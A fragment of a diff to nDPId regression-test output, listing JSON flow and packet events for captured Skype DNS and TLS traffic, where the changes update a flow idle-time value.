00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431970636301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636301,"pkt":"0NQSxnP1PBXCt3IOCABFAABLvh0AAEARORHAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ONsAAEARvmTAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAABAsV0AAEARRdzAqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQaoAAEARtY\/AqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431970636573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970636573,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIgG7yCDj6Zk0JLpYLaASOJC0hQAAAgQFrAQCCApMX+vyPjGNXAEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431970636573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636573,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0faxAAEAGKfnAqAEinTg0HMggAbskulgt4+mZNYAQECwKzQAAAQEICj4xjj9MX+vy"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431970636573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970636573,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIgG7yCDj6Zk0JLpYLaASOJC0hQAAAgQFrAQCCApMX+vyPjGNXAEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431970636573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636573,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0faxAAEAGKfnAqAEinTg0HMggAbskulgt4+mZNYAQECwKzQAAAQEICj4xjj9MX+vy"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1431970636624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970636624,"pkt":"0NQSxnP1PBXCt3IOCABFAABDZH4AAEARkrjAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1431970636624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970636624,"pkt":"0NQSxnP1PBXCt3IOCABFAABDjbsAAEARaXvAqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1431970636780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970636780,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7VPMAAEARokvAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} @@ -100,17 +100,17 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/1uEAAEARIFnAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLHJUAAEAR2pnAqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIxUAAEAR1BnAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} -01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} +01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLkYQAAEARZarAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLLWAAAEARyc7AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1431970637443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970637443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6+FgAAEAR\/ubAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABLoPEAAEARVj3AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/NIAAEAR+lvAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 